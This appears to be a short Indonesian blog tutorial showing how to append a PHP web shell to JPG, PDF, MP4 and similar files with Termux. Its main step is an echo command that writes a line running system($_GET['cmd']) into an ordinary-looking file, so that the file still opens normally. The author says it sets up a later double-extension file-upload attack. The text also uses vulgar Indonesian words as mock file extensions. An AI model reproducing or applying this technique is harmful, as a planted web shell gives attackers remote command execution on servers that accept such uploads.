Inject PHP Code in PDF,JPG,MP4,MP3,or more files


 -

Hai sobat

Saya ikal,

Disini saya akan share sesuatu nih.

-


Sesuai judul kita kali ini, kita akan bereksperimen lagi nih :D. Kita akan memasukan sebuah PHP Code kedalam PDF,JPG file, Sebenarnya sih ga cuma dua itu saja, kita juga dapat memasukan pada file .mp4,.mp3,.doc,.kontol,.memek,.dll. Tapi biar singkat, kita lakukan pada dua jenis file saja yah. Jika ingin bereksperimen menggunakan jenis file lain, silakan saja terapkan step by stepnya.


Bahan : 

- Termux or sejenisnya

- Real File JPG,PDF,or more


Okeh disini saya akan menerapkannya di termux yah, pertama kalian buka termux dan pindahkan file yang mau diinject ke directory termuxnya. Semisal file berada di /storage/emulated/0 kalian tinggal jalankan perintah berikut.


$cd /storage/emulated/0 && mv file.jpg $HOME && cd $HOME


Sesuaikan nama filenya. Jika sudah berada di directory termux, kalian jalankan perintah berikut.


$echo "<?php system($_GET['cmd']); ?>" >> file.jpg


Sesuaikan nama filenya dengan nama file yang mau diinject. 



Nah, selesai deh. Kalian tinggal pindahkan kembali file nya ke folder internal kalian, yaitu /storage/emulated/0 dengan cara mengketikan perintah berikut.


$mv file.jpg /storage/emulated/0


Nah, kira kira seperti itu cara untuk memasukan PHP Code kedalam file lainnnya. Untuk file pdf,doc,doc,mp4,atau yang lainnya, kalian bisa ikutin saja langkah - langkah diatas :D.


Cara ini lebih singkat,mudah dan jelas daripada kalian harus menginstall tools - tools lainnya. Karena disini kita hanya membutuhkan command echo saja :D. Dan untuk hasil nya, file yang di masukan PHP Code tadi akan tetap terbaca normal di device kita, jika ia file jpg, ia akan tetap terbaca gambar, dan jika ia pdf, ia akan tetap terbaca pdf. 


"Jadi fungsinya untuk apa dong bang >:(?"

Untuk kegunaanya akan saya bahas pada artikel berikutnya, yaitu mengenai Double-Extensions attack.


Segini saja artikel kali ini, saya harap kalian mengerti :D. 


Thanks

See U